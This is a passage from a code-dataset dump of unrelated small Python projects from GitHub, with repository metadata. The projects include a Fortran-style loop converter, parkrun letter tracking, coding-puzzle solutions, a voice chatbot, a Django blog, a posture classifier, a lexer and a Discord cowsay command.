= new_loop + \" do\";\n \n \n stuff = { 'lb' : lb, 'ub' : ub, \"var\" : var, \"step\" : step, \"new_loop\" : new_loop }\n\n\n return stuff\n \n return 0\n\ndef If_Statement(line):\n tmp = line\n pattern = re.compile(\"\\W*if\\W*\\(\")\n if pattern.match(line) or 'else' in line:\n tmp= tmp.replace(\"{\", \"\")\n tmp= tmp.replace(\"}\", \"\")\n tmp= tmp.replace(\"&&\", \" and \")\n tmp= tmp.replace(\"||\", \" or \")\n if 'if' in line:\n tmp = tmp + \" then\"\n return tmp\n else:\n return \"\"\n \n \n#szuka zmiennych\ndef CollectVars(varsn, loop1):\n op = \"[_A-Za-z_][_A-Za-z_\\d']*\"\n new_vars = re.findall(op, loop1)\n for zvar in new_vars:\n if not zvar in keywords:\n VARS.append([zvar, DimVar(zvar, loop1)])\n resulting_list = list(varsn)\n resulting_list.extend(x for x in new_vars if x not in resulting_list)\n return resulting_list \n\ndef CollectVars_O(content, varsn, pvarsn):\n op = \"\\W*for\\W*\\(\\W*[_A-Za-z_][_A-Za-z_\\d']*\"\n for line in content:\n if(re.match(op, line)):\n varx = re.findall(op, line)\n varx = re.compile(\"\\W*for\\W*\\(\\W*\").sub(\"\", varx[0])\n if varx not in varsn:\n varsn.append(varx)\n pvarsn.append(varx)\n return varsn #[varsn, pvarsn] potem\n \n# pobiera wymiar zmiennej z lini\ndef DimVar(var, line):\n # dim = var + \"\\W*\\[[^(\\=|\\<|\\>|\\+|\\-|\\*|\\/|;)]*\"\n line = line.replace(\"][\", \",\")\n \n dim = var + \"\\[[^\\]]*\"\n z = re.findall(dim, line)\n\n if len(z) == 0:\n return 0;\n dim_var = z[0].count(',')+1 \n return dim_var\n\n#pobiera wymiar zmiennej z 
tablicy (po wczytaniu)\ndef _DIM(var):\n for item in VARS:\n if(item[0] == var):\n return item[1]\n \n# Definitions\ndef MakeDef(var, dim):\n defv = \"integer \" + var;\n if dim > 0:\n defv += \"(\"; \n for i in range(1, dim+1):\n defv += \"0:9999,\" \n \n defv = re.compile(\",$\").sub(\")\", defv); \n return defv\n\n#przeksztalca funkcje\ndef ConvertSt(st):\n\n\n st = re.compile(\"\\]\\W*\\[\").sub(\",\", st)\n st = re.compile(\"\\[\").sub(\"(\", st)\n st = re.compile(\"\\]\").sub(\")\", st)\n st = st.replace(\";\", \"\")\n st = st.replace(\"%\", \" mod \")\n\n\n\n return st\n","repo_name":"lshadown/traco","sub_path":"py/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5331882466","text":"n = int(input())\n\nnew_list = []\n\nsearch_no = True\n\nfor i in range(n):\n nn = input()\n new_list.append(nn)\n\nk = int(input())\n\nfor x in range(k):\n word = input()\n\n fin_list = []\n for line in new_list:\n if word.lower() in line.lower():\n search_no = False\n fin_list.append(line)\n\nprint(*fin_list, sep='\\n')","repo_name":"Dinuliat/stepik_python1","sub_path":"xxx.py","file_name":"xxx.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41314347466","text":"import pandas as pd\n\"\"\"\nINTRODUCTION\n\n\n#Example data in array format: \na=([\n ['Bushy', '09/02/2022', '201', '24', '18:01', '75.21%', 'PB'],\n ['Worcester', '25/03/2022', '360', '13', '17:38', '76.84%', ''],\n ['Alvaston', '18/04/2022', '86','17', '16:55', '80.10%', 'PB'],\n ['Markeaton','04/04/2022','358','25','17:21','78.10%', '']\n ])\n\ndf = pd.DataFrame(a)\n\n\nExample output:\n\n4 events attended: Alvaston, Bushy, Markeaton, Worcester\n \n4 letters completed: B, A, M, W\n \n22 letters needed: C, D, E, F, G, H, I, J, K, L, N, O, P, Q, R, S, T, U, V, X, Y, Z\n\n\"\"\"\n\n\n\"\"\"\nMAIN CODE \n\"\"\"\n# make dataframe from All Events table (copied to clipboard)\ndf = pd.read_clipboard()\n\n#add column headings\ndf.columns=[\"Event\",\"Run Date\",\"Run Number\",\"Pos\",\"Time\",\"Age Grade\",\"PB\"]\n\n#initiate lists of letters completed and needed \nletters_completed=[]\nletters_needed=[]\n\n#append first letter of each event done to completed letters list\nfor event in df['Event']:\n letters_completed.append(event[0])\n \nletters_completed =(list(set(letters_completed)))\nletters_completed.sort()\n\n\n#iterate through alphabet to append letters missing from completed list to needed list\n \nalphabet=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nfor letter in alphabet:\n if letter not in letters_completed:\n letters_needed.append(letter)\n \n#print list of events attended in alphabetical order\nevents_attended= df['Event'].unique()\nevents_attended.sort()\nprint(len(events_attended),\"events attended: \",\", \".join(events_attended))\nprint(\" \")\n\n#print comma separated string of letters completed starting with total number of \nprint(len(letters_completed),\"letters completed: \", \", \".join(letters_completed))\nprint(\" \")\n\n#print comma separated string of letters needed starting with total number of \nprint(len(letters_needed),\"letters needed: \", \", 
\".join(letters_needed))\n\n\n\n","repo_name":"martin-kerr/parkrun-5k-challenges","sub_path":"alphabet-bingo.py","file_name":"alphabet-bingo.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10087130080","text":"from services.productos import Productos\n\n\nclass Mascotas(Productos):\n def __init__(self, nombre, tipo, precio, categoria, especie, edad, raza, mantenimiento):\n super().__init__(nombre, tipo, precio)\n self.categoria = categoria\n self.especie = especie\n self.edad = edad\n self.raza = raza\n self.mantenimiento = mantenimiento\n\n def __del__(self):\n pass\n\n @staticmethod\n def mostrar_datos(producto):\n Productos.mostrar_datos(producto)\n print(\"SECCION: \" + producto['categoria'] + \"\\nESPECIE:\" + producto['especie'] + \"\\nEDAD: \" + producto['edad'] + \"\\nMARCA: \" + producto['marca'] + \"\\nCUIDADOS ESPECIALES: \" + producto['mantenimiento'])\n\n def push(self, array):\n nuevo_producto = {\n 'id': self.id,\n 'nombre': self.nombre,\n 'tipo': self.tipo,\n 'precio': self.precio,\n 'categoria': self.categoria,\n 'especie': self.especie,\n 'edad': self.edad,\n 'raza': self.raza,\n 'mantenimiento': self.mantenimiento,\n }\n array.append(nuevo_producto)\n","repo_name":"InakiGT/uamart","sub_path":"services/mascotas.py","file_name":"mascotas.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23939680470","text":"a=[2, 1, 3, 5, 3, 2]\n\ndef firstDuplicate(a):\n lista=[]\n yatengo=[]\n for i in range(len(a)):\n if a[i] in yatengo :\n lista.append(a[i])\n\n yatengo.append(a[i])\n \n for l in lista:\n print(l)\n \n if lista == []:\n return -1\n else:\n return(lista[0])\n\nfirstDuplicate(a)","repo_name":"ivanFlor3s/first-python-scripts","sub_path":"Dumb-scripts/first-rep.py","file_name":"first-rep.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5506912807","text":"import pyttsx3\nimport speech_recognition as sr\nimport winsound\nimport time\n\ntalk = pyttsx3.init()\n# Set properties _before_ you add things to say\ntalk.setProperty('rate', 150) # Speed percent (can go over 100)\ntalk.setProperty('volume', 0.9) # Volume 0-1\n\n#possible lists of possible words or sentences with different punctuation\nhi_List = ['hi', 'Hi', 'Hello', 'hello', 'Hey', 'hey', 'yo', 'Yo,' 'salam', 'Salam', 'hi totla', 'Hi totla', 'totla', 'Totla']\nbye_List = ['Bye', 'bye', 'Goodbye', 'goodbye', 'Good bye' 'good bye', 'byebye', 'by by', 'By by', 'Tata', 'tata', 'So long', 'so long', 'okay bye', 'ok bye', 'Ok bye', 'Okay bye']\nqst1_list = [\"Who are you\", 'who are you', 'whats your name', 'your name', 'Your name', 'What are you', 'what are you']\nres_neg_list = ['bad robot', 'Bad robot','bad boy', \"Bad boy\", 'you are rude totla', 'You are rude totla', 'you are a bad robot', 'You are a bad robot']\nLove_list = ['i love you', 'I love you', 'Love you', 'love you']\nhate_list = ['i hate you', 'I hate you', 'Hate you', 'hate you']\nfriend_list = ['do you know who is my girl friend', 'do you know what is my girl friend name']\nname_list =['do you know', 'who i am','do you know me', 'do you know what is my name']\n\ndef Listen():\n \"\"\"\n Takes users voice as input and converts it to text.\n \"\"\"\n speech = sr.Recognizer()\n #say beep before listening\n \n #take input from microphone\n with 
sr.Microphone() as source:\n winsound.Beep(frequency = 2500, duration = 100) #beep to inform that it's listening\n print(\"Say>>\")\n voice = speech.listen(source) \n text = speech.recognize_google(voice)\n print(text) #print what it heard just to debug\n\n return text #return what was heard\n\n \ndef Decide(listen):\n \"\"\"\n Takes decision based on what user says.\n \"\"\"\n print(f\" Command = {listen}.\") #just to debug\n\n #see what user said is in which list or not\n if listen in hi_List:\n print(\"Resonse in Hi list\")\n Respond(\"Hi there, Good to see you. Assalamualaikum\")\n\n elif listen in bye_List:\n print(\"In bye list.\")\n Respond(\"I liked talking with you, okay take care.\")\n\n elif listen in Love_list:\n Respond(\"Yuk, I have a robot girl friend. No seat available\")\n \n elif listen in hate_list:\n Respond(\"I Hate you too.\")\n \n elif listen in qst1_list:\n Respond(\"\"\"I am Totla Robot. The dumb talking robot written in python.\n My creator Md Rayef Enam is trying to make me smart\"\"\")\n \n elif listen in res_neg_list:\n Respond(\"I am very sorry I was just joking.\")\n \n elif listen in friend_list:\n Respond(\"Your girl friend name is Taspiya Jaha Joya and she live in Norway at Oslo city\")\n \n elif listen in name_list:\n Respond(\"Your name is Md Rayef Enam and you are studying in Computer Science and Engineering at BGC Trust University Bangladesh\")\n\n else:\n Respond(\"Sorry I don't understand Please say again.\")\n\ndef Respond(t):\n print(f\"Talking the: {t}\") #to debug and see if everythings going okay\n\n talk.say(t)\n talk.setProperty('rate', 90) #90 words per minute\n talk.runAndWait()\n\nwhile True: #for ever loop \n\n comm = Listen() #listen to what user says\n\n Decide(comm) #take decision and respond\n\n time.sleep(1)\n","repo_name":"MDRAYEFENAM/NLP","sub_path":"TalkingBot.py","file_name":"TalkingBot.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2369528113","text":"string_size = int(input())\nstring = list(input())\nscore = 0\ni = 0\n\nwhile i in range(len(string)):\n c = string[i]\n if c == \"V\":\n score += 5\n elif c == \"W\":\n score += 2\n elif c == \"X\":\n i += 1\n elif c == \"Y\":\n if i != len(string) - 1:\n string.append(string[i+1])\n i += 1\n elif c == \"Z\":\n if i != len(string) - 1:\n if string[i+1] == \"V\":\n score = int(score / 5)\n i += 1\n elif string[i+1] == \"W\":\n score = int(score / 2)\n i += 1\n i += 1\n\nprint(score)\n","repo_name":"OmarAlSeddik/competitive-programming-codeforces","sub_path":"Assiut Sheets Python/sheet4/string_score.py","file_name":"string_score.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32320668601","text":"'''Query module\n'''\nfrom .db import TEDB, TEDBColumn, TEDBQuery, SortOrder\n\ndef query(database, select=None, distinct=False, where=None, order_by=None, order=None, limit=None, offset=None):\n '''Perform a query on the database\n '''\n with TEDB(database) as tedb:\n if select:\n select = [TEDBColumn(col) for col in select]\n if TEDBColumn.ALL in select and len(select) > 1:\n raise ValueError(\n \"Cannot specify column '*' with other columns\"\n )\n if order_by:\n order_by = [TEDBColumn(col) for col in order_by]\n if TEDBColumn.ALL in order_by:\n raise ValueError(\"order_by cannot contain '*' column\")\n if order:\n order = SortOrder(order)\n query = TEDBQuery(\n select, 
distinct, where, order_by, order, limit, offset\n )\n if len(select) == 1 and select[0] == TEDBColumn.ALL:\n yield [col.name for col in TEDB.ORDERED_COLUMNS]\n else:\n yield [col.name for col in select]\n yield from tedb.select(query)\n","repo_name":"koromodako/timeline_explorer","sub_path":"timeline_explorer/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37351234990","text":"# CP template Version 1.006\nimport os\nimport sys\n#import string\n#from functools import cmp_to_key, reduce, partial\n#import itertools\n#from itertools import product\n#import collections\n#from collections import deque\n#from collections import Counter, defaultdict as dd\n#import math\n#from math import log, log2, ceil, floor, gcd, sqrt\n#from heapq import heappush, heappop\n#import bisect\n#from bisect import bisect_left as bl\nDEBUG = False\n\ndef main(f=None):\n init(f)\n # sys.setrecursionlimit(10**9)\n # ######## INPUT AREA BEGIN ##########\n\n def rotate(arr):\n for cur, nxt in arr:\n brd[cur] = brd[nxt]\n brd[nxt] = 0\n\n R, C, T = map(int,input().split())\n L = C+1\n brd = [-1] * (R+1)*L\n dir = (1, -1, L, -L)\n for r in range(0, R*L, L):\n brd[r:r+C] = map(int,input().split())\n \n for r in range(0, R*L, L):\n if brd[r] == -1:\n puu, pud = r, r+L\n break\n \n rtu = list(range(puu-L, 0, -L)) + list(range(0, L-2)) + list(range(L-2, puu, L)) + list(range(pud-2, puu, -1))\n rtu = list(zip(rtu, rtu[1:]))\n rtd = list(range(pud+L, R*L-L, L)) + list(range(R*L-L, R*L-2)) + list(range(R*L-2, pud+L, -L)) + list(range(pud+L-2, pud, -1)) \n rtd = list(zip(rtd, rtd[1:]))\n\n for _ in range(T):\n\n dif = [0] * R*L\n\n for c in range(0, R*L, L):\n for cur in range(c, c+C):\n if brd[cur] > 4:\n mov = brd[cur]//5\n for d in dir:\n if brd[cur+d] != -1:\n dif[cur] -= mov\n dif[cur+d] += mov\n\n for c in range(0, R*L, L):\n for cur in range(c, c+C):\n brd[cur] += dif[cur]\n\n rotate(rtu)\n rotate(rtd)\n\n print(sum(brd)+R+L+2)\n \n # ######## INPUT AREA END ############\n\n\n# TEMPLATE ###############################\n\n\nenu = enumerate\n\n\ndef For(*args):\n return itertools.product(*map(range, args))\n\n\ndef Mat(h, w, default=None):\n return [[default for _ in range(w)] for _ in range(h)]\n\n\ndef nDim(*args, default=None):\n if len(args) == 1:\n return [default for _ in range(args[0])]\n else:\n return [nDim(*args[1:], default=default) for _ in range(args[0])]\n\n\ndef setStdin(f):\n global DEBUG, input\n DEBUG = True\n sys.stdin = open(f)\n input = sys.stdin.readline\n\n\ndef init(f=None):\n global input\n input = sys.stdin.readline # io.BytesIO(os.read(0, os.fstat(0).st_size)).readline\n if os.path.exists(\"o\"):\n sys.stdout = open(\"o\", \"w\")\n if f is not None:\n setStdin(f)\n else:\n if len(sys.argv) == 1:\n if os.path.isfile(\"in/i\"):\n setStdin(\"in/i\")\n elif os.path.isfile(\"i\"):\n setStdin(\"i\")\n elif len(sys.argv) == 2:\n setStdin(sys.argv[1])\n else:\n assert False, \"Too many sys.argv: %d\" % len(sys.argv)\n\n\ndef pr(*args):\n if DEBUG:\n print(*args)\n\n\ndef pfast(*args, end=\"\\n\", sep=' '):\n sys.stdout.write(sep.join(map(str, args)) + end)\n\n\ndef parr(arr):\n for i in arr:\n print(i)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TaemHam/Baekjoon_Submission","sub_path":"17144 미세먼지 
안녕/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17528207964","text":"\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Tag, Article\nfrom .models import Contact\nfrom django.http import HttpResponse\nfrom django.db.models import Q\n\ndef home(request):\n\n # feature articles on the home page\n featured = Article.articlemanager.filter(featured=True)[0:6]\n\n context = {\n 'articles': featured\n }\n\n return render(request, 'index.html', context)\n\n\ndef articles(request):\n\n # get query from request\n query = request.GET.get('query')\n # print(query)\n # Set query to '' if None\n if query == None:\n query = ''\n\n # articles = Article.articlemanager.all()\n # search for query in headline, sub headline, body\n articles = Article.articlemanager.filter(\n Q(headline__icontains=query) |\n Q(sub_headline__icontains=query) |\n Q(body__icontains=query)\n )\n\n Tags = Tag.objects.all()\n\n context = {\n 'articles': articles,\n }\n\n return render(request, 'articles.html', context)\n\n\ndef article(request, article):\n\n article = get_object_or_404(Article, slug=article, status='published')\n\n context = {\n 'article': article\n }\n\n return render(request, 'article.html', context)\n\ndef about(request):\n return render(request, 'about.html') \n\ndef contact(request):\n if request.method==\"POST\":\n contact=Contact()\n name=request.POST.get('name')\n email=request.POST.get('email')\n mobileno=request.POST.get('mobileno')\n message=request.POST.get('message')\n contact.name=name\n contact.email=email\n contact.mobileno=mobileno\n contact.message=message\n contact.save()\n return HttpResponse(\"<h1>THANKS FOR CONTACT US</h1>\")\n return render(request, 'contact.html')\n\n\n","repo_name":"ravi7380/AHR-BLOGS.github.io","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16456867039","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n# Author: qjk\n\nimport collections\nclass Solution(object):\n def findPairs(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n result = 0\n c = collections.Counter(nums)\n for i in c:\n if k > 0 and i + k in c or k == 0 and c[i] > 1:\n result += 1\n return result\n\nif __name__ == '__main__':\n print(Solution().findPairs([1, 3, 1, 5, 4, 4], 0))","repo_name":"Roc-J/LeetCode","sub_path":"500~599/problem532.py","file_name":"problem532.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"71232354076","text":"import logging\nimport shutil\n\nfrom giza.libgiza.task import Task\n\nfrom giza.content.steps.inheritance import StepDataCache\nfrom giza.content.steps.views import render_steps\nfrom giza.config.content import new_content_type\n\nlogger = logging.getLogger('giza.content.steps.tasks')\n\n\ndef register_steps(conf):\n content_dfn = new_content_type(name='steps',\n task_generator=step_tasks,\n conf=conf)\n\n conf.system.content.add(name='steps', definition=content_dfn)\n\n\ndef write_steps(steps, fn, conf):\n content = render_steps(steps, conf)\n content.write(fn)\n logger.debug('wrote steps to: ' + fn)\n\n\ndef step_tasks(conf):\n s = StepDataCache(conf.system.content.steps.sources, conf)\n s.create_output_dir()\n\n 
tasks = []\n    for fn, stepf in s.file_iter():\n        t = Task(job=write_steps,\n                 args=(stepf, stepf.target(fn), conf),\n                 description='generate a stepfile for ' + fn,\n                 target=stepf.target(fn),\n                 dependency=fn)\n        tasks.append(t)\n\n    logger.debug('added tasks for {0} step generation tasks'.format(len(tasks)))\n    return tasks\n\n\ndef step_clean(conf):\n    return [Task(job=shutil.rmtree,\n                 args=[conf.system.content.steps.output_dir],\n                 target=True,\n                 dependency=[conf.system.content.steps.output_dir],\n                 description='removing {0}'.format(conf.system.content.steps.output_dir))]\n","repo_name":"mongodb/docs-tools","sub_path":"giza/giza/content/steps/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"50"} +{"seq_id":"8854988993","text":"import json\nimport numpy as np\nimport sys\nimport os\nimport matplotlib.pyplot as plt \nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\n# import needed for classifyKnn below; it was missing and raised a NameError\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\n\n\n\n#outlier detection \n#classification\n\nclass PoseClassifier():\n\n    def __init__(self, features, targets, class_names):\n        self.X_train, self.X_test, self.y_train, self.y_test = \\\n            train_test_split(features, targets, random_state=0)\n        self.class_names = class_names\n\n    def classifySVN(self):\n        print('SVN classifier initialization')\n        classifier = SVC(kernel='linear', C=0.001, gamma='scale', verbose=True).fit(self.X_train, self.y_train)\n        np.set_printoptions(precision=2)\n        titles_options = [(\"Confusion matrix, without normalization\", None),\n                          (\"Normalized confusion matrix\", 'true')]\n        print('confusion_matrix building')\n        print(classifier.score(self.X_test, self.y_test))\n        for title, normalize in titles_options:\n            disp = plot_confusion_matrix(classifier, self.X_test, self.y_test,\n                                         display_labels=self.class_names,\n                                         cmap=plt.cm.Blues,\n                                         normalize=normalize)\n            disp.ax_.set_title(title)\n\n            print(title)\n            print(disp.confusion_matrix)\n\n        plt.show()\n    def classifyKnn(self):\n        print('KNN classifier initialization')\n        # KNeighborsClassifier does not accept a verbose keyword; it was removed\n        classifier = KNeighborsClassifier(n_neighbors=3).fit(self.X_train, self.y_train)\n        np.set_printoptions(precision=2)\n        titles_options = [(\"Confusion matrix, without normalization\", None),\n                          (\"Normalized confusion matrix\", 'true')]\n        print('confusion_matrix building')\n        print(classifier.score(self.X_test, self.y_test))\n        for title, normalize in titles_options:\n            disp = plot_confusion_matrix(classifier, self.X_test, self.y_test,\n                                         display_labels=self.class_names,\n                                         cmap=plt.cm.Blues,\n                                         normalize=normalize)\n            disp.ax_.set_title(title)\n\n            print(title)\n            print(disp.confusion_matrix)\n    \n    \n    def plot_conf_mat(self):\n        pass\n","repo_name":"IvannaKramer/poor_neck_posture_dataset","sub_path":"src/posture_classifier.py","file_name":"posture_classifier.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"12092247891","text":"from __future__ import annotations\nfrom enum import Enum\n\n\nclass TokenType(Enum):\n    \"\"\"Enum representing all token types.\"\"\"\n    EOF = 0\n    SEMICOLON = 1\n    EQUALS = 2\n    LBRACE = 3\n    RBRACE = 4\n    ARROW = 5\n    LPAREN = 6\n    RPAREN = 7\n    QUOTE = 8\n    COMMA = 9\n    PROPERTY = 10\n    NUMBER = 11\n    ID = 12\n\n\nclass Token:\n    \"\"\"Token abstraction.\"\"\"\n\n    def __init__(self, token_type: int, text: str) -> None:\n        \"\"\"Constructor.\n        Args:\n            
token_type (TokenType): A numeric token type representation.\n            text (str): A lexeme\n        \"\"\"\n        self.token_type = token_type\n        self.text = text\n\n    def __str__(self) -> str:\n        return f\"{self.text}, {TokenType(self.token_type).name}\"\n\n    def __hash__(self):\n        return hash((self.token_type, self.text))\n\n    def __eq__(self, other: Token) -> bool:\n        # combine with \"and\" so a bool is returned; the original returned a\n        # (always truthy) tuple, making every pair of tokens compare equal\n        return (\n            self.token_type == other.token_type and\n            self.text == other.text\n        )\n\n\nclass Lexer:\n    \"\"\"Lexer for the parser module.\"\"\"\n\n    def __init__(self, input_stream: str) -> None:\n        \"\"\"Constructor.\n        Args:\n            input_stream (str): String input to be lexified.\n        \"\"\"\n        self.input_stream = input_stream\n        self.pos: int = 0\n        self.line_num: int = 1\n        self.char_num: int = 1\n\n        if len(input_stream) != 0:\n            self.char = self.input_stream[self.pos]\n        else:\n            self.char = TokenType.EOF\n\n    def next_token(self) -> Token:\n        \"\"\"Return the next token from the input stream, ignoring whitespace.\"\"\"\n        while self.char != TokenType.EOF:\n\n            if self.char in [' ', '\\t', '\\n', '\\r']:\n                self.consume()\n\n            elif self.char in ['\\'', '\\\"']:\n                self.consume()\n                return Token(TokenType.QUOTE, '\"')\n\n            elif self.char == ';':\n                self.consume()\n                return Token(TokenType.SEMICOLON, ';')\n\n            elif self.char == ',':\n                self.consume()\n                return Token(TokenType.COMMA, ',')\n\n            elif self.char == '{':\n                self.consume()\n                return Token(TokenType.LBRACE, '{')\n\n            elif self.char == '}':\n                self.consume()\n                return Token(TokenType.RBRACE, '}')\n\n            elif self.char == '(':\n                self.consume()\n                return Token(TokenType.LPAREN, '(')\n\n            elif self.char == ')':\n                self.consume()\n                return Token(TokenType.RPAREN, ')')\n\n            elif self.char == '-':\n                self.consume()\n                if self.char == '>':\n                    self.consume()\n                    return Token(TokenType.ARROW, '->')\n                else:\n                    self.error()\n\n            elif self.char == '=':\n                self.consume()\n                return Token(TokenType.EQUALS, '=')\n\n            elif self.char == '#':\n                # comments run to end of line and are discarded\n                while self.char != TokenType.EOF and self.char != '\\n':\n                    self.consume()\n\n            elif self.char.isdigit():\n                lexeme = \"\"\n                while self.char != TokenType.EOF and self.char.isdigit():\n                    lexeme += self.char\n                    self.consume()\n                return Token(TokenType.NUMBER, lexeme)\n\n            elif self.char.isalpha():\n                lexeme = \"\"\n                while (self.char != TokenType.EOF and\n                       (self.char.isalpha() or\n                        self.char.isdigit() or\n                        self.char == '_')):\n                    lexeme += self.char\n                    self.consume()\n                return Token(TokenType.ID, lexeme)\n            else:\n                self.error()\n\n        return Token(TokenType.EOF, \"<EOF>\")\n\n    def consume(self) -> None:\n        \"\"\"Advance to the next character in the input stream, or EOF.\"\"\"\n        if self.char in ['\\n', '\\r']:\n            self.line_num += 1\n            self.char_num += 1\n        else:\n            self.char_num += 1\n\n        self.pos += 1\n        if self.pos >= len(self.input_stream):\n            self.char = TokenType.EOF\n        else:\n            self.char = self.input_stream[self.pos]\n\n    def error(self) -> None:\n        raise SyntaxError(f\"Invalid character {self.char} at \"\n                          f\"[{self.line_num}:{self.char_num}]\")\n","repo_name":"krummja/Apparata","sub_path":"apparata/parser/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6580432512","text":"from LJ.application.Modules.Particle import Particle\nfrom collections import defaultdict\nimport sys\nimport itertools\n\nclass Cell:\n    def __init__(self,idx,x1,y1,x2,y2,l):\n        self.id = idx\n        self.x1 = x1\n        self.x2 = x2\n        self.y1 = y1\n        self.y2 = y2\n        self.boundary = 
{\"TOP\":None,\"LEFT\":None,\"RIGHT\":None,\"BOTTOM\":None,\"TOPRIGHT\":None,\"TOPLEFT\":None,\"BOTTOMRIGHT\":None,\"BOTTOMLEFT\":None}\n self.particleList = defaultdict()\n self.count = 0\n self.l = l\n self.already_interacted = False\n\n def add_particle(self,A):\n self.particleList[A.id] = A\n self.count +=1\n\n def remove_particle(self,A):\n self.particleList.pop(A.id, None)\n self.count -= 1\n\n def check_if_present(self,A):\n if self.x1 >=A.x and A.x<=self.x2:\n if self.y1 >=A.y and A.y<=self.y2:\n return True\n return False\n\n def status(self):\n sys.stdout.write(\"\\n ({},{}) to ({},{}) and has {} particles. \".format(self.x1,self.y1,self.x2,self.y2,self.count))\n\n\n def getAdjacentParticles(self):\n adjacentParticleList = list(self.particleList.values())\n for x in self.boundary:\n if self.boundary[x] != None:\n # if self.boundary[x].already_interacted == False:\n # print(\"Getting values from \" + x)\n adjacentParticleList = adjacentParticleList+ list(self.boundary[x].particleList.values())\n return adjacentParticleList\n","repo_name":"ashwinroot/Dynamic-Morphology-Honeybees","sub_path":"LJ/application/Modules/Cell.py","file_name":"Cell.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17877289373","text":"from discord.ext.commands import Bot, Command, Context, command\nimport subprocess\n\n\ndef runUnixCmd(*args):\n res = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', env={})\n return res.stdout\n\n\nclass Cowsay:\n def __init__(self):\n # runUnixCmd(*'cowsay 💕💕💕 à¶ž'.split())\n self.brief = runUnixCmd(*'cowsay -h'.split()).replace('cowsay', '%s')\n self.charList = '\\n'.join(runUnixCmd(*'cowsay -l'.split()).split('\\n')[1:]).split()\n\n async def cowcom(self, ctx: Context, *args: str, cowcommand='cowsay'):\n if cowcommand not in 'cowsay cowthink'.split():\n return\n param0s = 'bdgpstwyhl'\n param1s = 'efTW'\n foundParams = {}\n i, l = 0, len(args)\n while i<l:\n a = args[i]\n if a.startswith('-'):\n p0s = ''.join([si for si in a[1:] if si in param0s])\n p1s = ''.join([si for si in a[1:] if si in param1s])\n if p0s:\n if p1s:\n return\n else:\n for si in p0s: foundParams[si] = ()\n i += 1\n elif len(p1s) == 1:\n foundParams[p1s] = args[i+1]\n i += 2\n else:\n return\n else:\n foundParams['args'] = ' '.join(args[i:])\n break\n\n if 'f' in foundParams:\n foundParams['f'] = foundParams['f'].lower()\n if foundParams['f'] not in self.charList:\n return\n\n foundParams.setdefault('args', ' ')\n if 'l' in foundParams:\n await ctx.send(f'Alternative cows you can select in combination with `-f`:\\n```{\", \".join(self.charList)}```')\n elif 'h' in foundParams:\n await ctx.send(f'```{self.brief}```' % cowcommand)\n else:\n unixArgs = [cowcommand]\n p0s = [p for p in param0s if p in foundParams]\n if p0s:\n unixArgs.append('-' + ''.join(p0s))\n p1s = [p for p in param1s if p in foundParams]\n for p in p1s:\n unixArgs += ['-'+p, foundParams[p]]\n unixArgs.append(foundParams['args'])\n await ctx.send(f'```{runUnixCmd(*unixArgs)}```')\n\n def addCommandsToBot(self, bot: Bot):\n for cmd in 'cowsay cowthink'.split():\n bot.add_command(command(\n name=cmd,\n brief=self.brief % cmd\n )(getattr(self, 
